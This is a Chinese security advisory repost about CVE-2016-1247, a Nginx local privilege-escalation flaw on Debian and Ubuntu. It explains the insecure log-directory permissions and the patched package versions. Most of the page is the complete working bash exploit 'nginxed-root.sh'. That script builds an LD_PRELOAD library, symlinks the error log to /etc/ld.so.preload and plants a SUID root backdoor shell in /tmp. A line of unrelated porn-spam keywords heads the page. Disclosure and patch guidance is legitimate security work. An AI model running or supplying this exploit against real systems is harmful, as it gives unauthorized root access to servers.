99久久国产综合精品国_亚洲av日韩aⅴ电影_午夜福利在线电影_亚洲aⅤ色欲久久一区二区三区_91九色蝌蚪国产精品_亚洲av无码乱码在线观看四虎_4国产精品无码制服丝袜_亚洲Av成人五月天在线观看_牛牛成人永久免费视频_午夜福利在线资源


【漏洞預(yù)警】 CVE-2016-1247:Debian、Ubuntu發(fā)行版的Nginx本地提權(quán)漏洞(含POC)

本文原創(chuàng)作者:adlab_mickey

來源:安全客

t01e01ef6883252ab2e

漏洞發(fā)現(xiàn)人:Dawid Golunski

CVE編號 ?:CVE-2016-1247

發(fā)行日期 ?:15.11.2016

安全級別 ?:

背景介紹

Nginx是一個(gè)高性能的HTTP和反向代理服務(wù)器,也是一個(gè) IMAP/POP3/SMTP 代理服務(wù)器。 Nginx 是由 Igor Sysoev 為俄羅斯訪問量第二的 Rambler.ru 站點(diǎn)開發(fā)的,第一個(gè)公開版本0.1.0發(fā)布于2004年10月4日。其將源代碼以類BSD許可證的形式發(fā)布,因它的穩(wěn)定性、豐富的功能集、示例配置文件和低系統(tǒng)資源的消耗而聞名。2011年6月1日,nginx 1.0.4發(fā)布。 Nginx是一款輕量級的Web 服務(wù)器/反向代理服務(wù)器及電子郵件(IMAP/POP3)代理服務(wù)器,并在一個(gè)BSD-like 協(xié)議下發(fā)行。由俄羅斯的程序設(shè)計(jì)師Igor Sysoev所開發(fā),其特點(diǎn)是占有內(nèi)存少,并發(fā)能力強(qiáng)。

漏洞描述

Debian、Ubuntu發(fā)行版的Nginx在新建日志目錄的時(shí),使用了不安全的權(quán)限,因此本地惡意攻擊者可以從nginx/web用戶權(quán)限(www-data)提升到ROOT。

漏洞概要

Debian發(fā)行版的Nginx本地提權(quán)漏洞,該漏洞已經(jīng)在1.6.2-5+deb8u3中修復(fù)

因?yàn)樵撀┒醇?xì)節(jié)是在官方修復(fù)后公布的,因此請低版本的Debian/ubuntu用戶及時(shí)更新補(bǔ)?。?/p>

補(bǔ)丁修復(fù)情況:

Debian:

在Nginx 1.6.2-5+deb8u3中修復(fù)

Ubuntu:

Ubuntu 16.04 LTS:

在1.10.0-0ubuntu0.16.04.3中修復(fù)

Ubuntu 14.04 LTS:

在1.4.6-1ubuntu3.6中修復(fù)

Ubuntu 16.10:

在1.10.1-0ubuntu1.1中修復(fù)

漏洞細(xì)節(jié)

基于Debian系統(tǒng)默認(rèn)安裝的Nginx會在下面的路徑使用下面的權(quán)限新建Nginx日志目錄

1
2
3
4
5
root@xenial:~#?ls?-ld?/var/log/nginx/
drwxr-x---?2?www-data?adm?4096?Nov?12?22:32?/var/log/nginx/
root@xenial:~#?ls?-ld?/var/log/nginx/*
-rw-r-----?1?www-data?adm?????????0?Nov?12?22:31?/var/log/nginx/access.log
-rw-r--r--?1?root?????root????0?Nov?12?22:47?/var/log/nginx/error.log

我們可以看到/var/log/nginx目錄的擁有者是www-data,因此本地攻擊者可以通過符號鏈接到任意文件來替換日志文件,從而實(shí)現(xiàn)提權(quán)。

攻擊者通過符號鏈接替換了日志文件后,需要等nginx daemon重新打開日志文件,因此需要重啟Nginx,或者nginx damon接受USR1進(jìn)程信號。

這里亮點(diǎn)來了,USR1進(jìn)程信號會在默認(rèn)安裝的Nginx通過logrotate腳本調(diào)用的do_rotate()函數(shù)自動觸發(fā)。

——–[ /etc/logrotate.d/nginx ]——–

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/var/log/nginx/*.log?{
daily
missingok
rotate?52
compress
delaycompress
notifempty
create?0640?www-data?adm
sharedscripts
prerotate
if?[?-d?/etc/logrotate.d/httpd-prerotate?];?then?\
run-parts?/etc/logrotate.d/httpd-prerotate;?\
fi?\
endscript
postrotate
invoke-rc.d?nginx?rotate?>/dev/null?2>&1
endscript
}
[...]
do_rotate()?{
????????start-stop-daemon?--stop?--signal?USR1?--quiet?--pidfile?$PID?--name?$NAME
????????return?0
}
[...]

我們可以看到logrotation腳本會在corn中每天6:25AM自動調(diào)用,因此如果/etc/logrotate.d/nginx已經(jīng)設(shè)置了’daily’日志回滾,攻擊者將在不需要任何系統(tǒng)管理員交互的情況下,在24小時(shí)內(nèi)實(shí)現(xiàn)提權(quán)到ROOT

漏洞驗(yàn)證截圖

t01220d5a1b823ab522

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
#!/bin/bash
#
#?Nginx?(Debian-based?distros)?-?Root?Privilege?Escalation?PoC?Exploit
#?nginxed-root.sh?(ver.?1.0)
#
#?CVE-2016-1247
#
#?Discovered?and?coded?by:
#
#?Dawid?Golunski
#?dawid[at]legalhackers.com
#
#?https://legalhackers.com
#
#?Follow?https://twitter.com/dawid_golunski?for?updates?on?this?advisory.
#
#?---
#?This?PoC?exploit?allows?local?attackers?on?Debian-based?systems?(Debian,?Ubuntu
#?etc.)?to?escalate?their?privileges?from?nginx?web?server?user?(www-data)?to?root?
#?through?unsafe?error?log?handling.
#
#?The?exploit?waits?for?Nginx?server?to?be?restarted?or?receive?a?USR1?signal.
#?On?Debian-based?systems?the?USR1?signal?is?sent?by?logrotate?(/etc/logrotate.d/nginx)
#?script?which?is?called?daily?by?the?cron.daily?on?default?installations.
#?The?restart?should?take?place?at?6:25am?which?is?when?cron.daily?executes.
#?Attackers?can?therefore?get?a?root?shell?automatically?in?24h?at?most?without?any?admin
#?interaction?just?by?letting?the?exploit?run?till?6:25am?assuming?that?daily?logrotation?
#?has?been?configured.?
#
#
#?Exploit?usage:
#?./nginxed-root.sh?path_to_nginx_error.log?
#
#?To?trigger?logrotation?for?testing?the?exploit,?you?can?run?the?following?command:
#
#?/usr/sbin/logrotate?-vf?/etc/logrotate.d/nginx
#
#?See?the?full?advisory?for?details?at:
#?https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
#?Video?PoC:
#?https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
#
#?Disclaimer:
#?For?testing?purposes?only.?Do?no?harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function?cleanexit?{
#?Cleanup?
echo?-e?"\n[+]?Cleaning?up..."
rm?-f?$PRIVESCSRC
rm?-f?$PRIVESCLIB
rm?-f?$ERRORLOG
touch?$ERRORLOG
if?[?-f?/etc/ld.so.preload?];?then
echo?-n?>?/etc/ld.so.preload
fi
echo?-e?"\n[+]?Job?done.?Exiting?with?code?$1?\n"
exit?$1
}
function?ctrl_c()?{
????????echo?-e?"\n[+]?Ctrl+C?pressed"
cleanexit?0
}
#intro?
cat?<<_eascii_
?_______________________________
<?Is?your?server?(N)jinxed???;o?>
?-------------------------------
???????????\?
????????????\??????????__---__
????????????????????_-???????/--______
???????????????__--(?/?????\?)XXXXXXXXXXX\v.??
?????????????.-XXX(???O???O??)XXXXXXXXXXXXXXX-?
????????????/XXX(???????U?????)????????XXXXXXX\?
??????????/XXXXX(??????????????)--_??XXXXXXXXXXX\?
?????????/XXXXX/?(??????O?????)???XXXXXX???\XXXXX\?
?????????XXXXX/???/????????????XXXXXX???\__?\XXXXX
?????????XXXXXX__/??????????XXXXXX?????????\__---->
?---___??XXX__/??????????XXXXXX??????\__?????????/
???\-??--__/???___/\??XXXXXX????????????/??___--/=
????\-\????___/????XXXXXX??????????????'---?XXXXXX
???????\-\/XXX\?XXXXXX??????????????????????/XXXXX
?????????\XXXXXXXXX???\????????????????????/XXXXX/
??????????\XXXXXX??????>?????????????????_/XXXXX/
????????????\XXXXX--__/??????????????__--?XXXX/
?????????????-XXXXXXXX---------------??XXXXXX-
????????????????\XXXXXXXXXXXXXXXXXXXXXXXXXX/
??????????????????""VXXXXXXXXXXXXXXXXXXV""
_eascii_
echo?-e?"\033[94m?\nNginx?(Debian-based?distros)?-?Root?Privilege?Escalation?PoC?Exploit?(CVE-2016-1247)?\nnginxed-root.sh?(ver.?1.0)\n"
echo?-e?"Discovered?and?coded?by:?\n\nDawid?Golunski?\nhttps://legalhackers.com?\033[0m"
#?Args
if?[?$#?-lt?1?];?then
echo?-e?"\n[!]?Exploit?usage:?\n\n$0?path_to_error.log?\n"
echo?-e?"It?seems?that?this?server?uses:?`ps?aux?|?grep?nginx?|?awk?-F'log-error='?'{?print?$2?}'?|?cut?-d'?'?-f1?|?grep?'/'`\n"
exit?3
fi
#?Priv?check
echo?-e?"\n[+]?Starting?the?exploit?as:?\n\033[94m`id`\033[0m"
id?|?grep?-q?www-data
if?[?$??-ne?0?];?then
echo?-e?"\n[!]?You?need?to?execute?the?exploit?as?www-data?user!?Exiting.\n"
exit?3
fi
#?Set?target?paths
ERRORLOG="$1"
if?[?!?-f?$ERRORLOG?];?then
echo?-e?"\n[!]?The?specified?Nginx?error?log?($ERRORLOG)?doesn't?exist.?Try?again.\n"
exit?3
fi
#?[?Exploitation?]
trap?ctrl_c?INT
#?Compile?privesc?preload?library
echo?-e?"\n[+]?Compiling?the?privesc?shared?library?($PRIVESCSRC)"
cat?<<_solibeof_>$PRIVESCSRC
#define?_GNU_SOURCE
#include?<stdio.h>
#include?<sys/stat.h>
#include?<unistd.h>
#include?<dlfcn.h>
???????#include?<sys/types.h>
???????#include?<sys/stat.h>
???????#include?<fcntl.h>
uid_t?geteuid(void)?{
static?uid_t??(*old_geteuid)();
old_geteuid?=?dlsym(RTLD_NEXT,?"geteuid");
if?(?old_geteuid()?==?0?)?{
chown("$BACKDOORPATH",?0,?0);
chmod("$BACKDOORPATH",?04777);
unlink("/etc/ld.so.preload");
}
return?old_geteuid();
}
_solibeof_
/bin/bash?-c?"gcc?-Wall?-fPIC?-shared?-o?$PRIVESCLIB?$PRIVESCSRC?-ldl"
if?[?$??-ne?0?];?then
echo?-e?"\n[!]?Failed?to?compile?the?privesc?lib?$PRIVESCSRC."
cleanexit?2;
fi
#?Prepare?backdoor?shell
cp?$BACKDOORSH?$BACKDOORPATH
echo?-e?"\n[+]?Backdoor/low-priv?shell?installed?at:?\n`ls?-l?$BACKDOORPATH`"
#?Safety?check
if?[?-f?/etc/ld.so.preload?];?then
echo?-e?"\n[!]?/etc/ld.so.preload?already?exists.?Exiting?for?safety."
exit?2
fi
#?Symlink?the?log?file
rm?-f?$ERRORLOG?&&?ln?-s?/etc/ld.so.preload?$ERRORLOG
if?[?$??-ne?0?];?then
echo?-e?"\n[!]?Couldn't?remove?the?$ERRORLOG?file?or?create?a?symlink."
cleanexit?3
fi
echo?-e?"\n[+]?The?server?appears?to?be?\033[94m(N)jinxed\033[0m?(writable?logdir)?!????Symlink?created?at:?\n`ls?-l?$ERRORLOG`"
#?Make?sure?the?nginx?access.log?contains?at?least?1?line?for?the?logrotation?to?get?triggered
curl?http://localhost/?>/dev/null?2>/dev/null
#?Wait?for?Nginx?to?re-open?the?logs/USR1?signal?after?the?logrotation?(if?daily?
#?rotation?is?enable?in?logrotate?config?for?nginx,?this?should?happen?within?24h?at?6:25am)
echo?-ne?"\n[+]?Waiting?for?Nginx?service?to?be?restarted?(-USR1)?by?logrotate?called?from?cron.daily?at?6:25am..."
while?:;?do?
sleep?1
if?[?-f?/etc/ld.so.preload?];?then
echo?$PRIVESCLIB?>?/etc/ld.so.preload
rm?-f?$ERRORLOG
break;
fi
done
#?/etc/ld.so.preload?should?be?owned?by?www-data?user?at?this?point
#?Inject?the?privesc.so?shared?library?to?escalate?privileges
echo?$PRIVESCLIB?>?/etc/ld.so.preload
echo?-e?"\n[+]?Nginx?restarted.?The?/etc/ld.so.preload?file?got?created?with?web?server?privileges:?\n`ls?-l?/etc/ld.so.preload`"
echo?-e?"\n[+]?Adding?$PRIVESCLIB?shared?lib?to?/etc/ld.so.preload"
echo?-e?"\n[+]?The?/etc/ld.so.preload?file?now?contains:?\n`cat?/etc/ld.so.preload`"
chmod?755?/etc/ld.so.preload
#?Escalating?privileges?via?the?SUID?binary?(e.g.?/usr/bin/sudo)
echo?-e?"\n[+]?Escalating?privileges?via?the?$SUIDBIN?SUID?binary?to?get?root!"
sudo?2>/dev/null?>/dev/null
#?Check?for?the?rootshell
ls?-l?$BACKDOORPATH
ls?-l?$BACKDOORPATH?|?grep?rws?|?grep?-q?root
if?[?$??-eq?0?];?then?
echo?-e?"\n[+]?Rootshell?got?assigned?root?SUID?perms?at:?\n`ls?-l?$BACKDOORPATH`"
echo?-e?"\n\033[94mThe?server?is?(N)jinxed?!????Got?root?via?Nginx!\033[0m"
else
echo?-e?"\n[!]?Failed?to?get?root"
cleanexit?2
fi
rm?-f?$ERRORLOG
echo?>?$ERRORLOG
?
#?Use?the?rootshell?to?perform?cleanup?that?requires?root?privilges
$BACKDOORPATH?-p?-c?"rm?-f?/etc/ld.so.preload;?rm?-f?$PRIVESCLIB"
#?Reset?the?logging?to?error.log
$BACKDOORPATH?-p?-c?"kill?-USR1?`pidof?-s?nginx`"
#?Execute?the?rootshell
echo?-e?"\n[+]?Spawning?the?rootshell?$BACKDOORPATH?now!?\n"
$BACKDOORPATH?-p?-i
#?Job?done.
cleanexit?0:Debian、ubuntu發(fā)行版的Nginx本地提權(quán)漏洞(含POC)

修復(fù)方案

升級為最新的Nginx軟件包

https://www.debian.org/security/2016/dsa-3701

https://www.ubuntu.com/usn/usn-3114-1/

參考鏈接

http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

原文地址:http://bobao.#/learning/detail/3195.html

上一篇
下一篇

聯(lián)系我們:cert@chaosec.com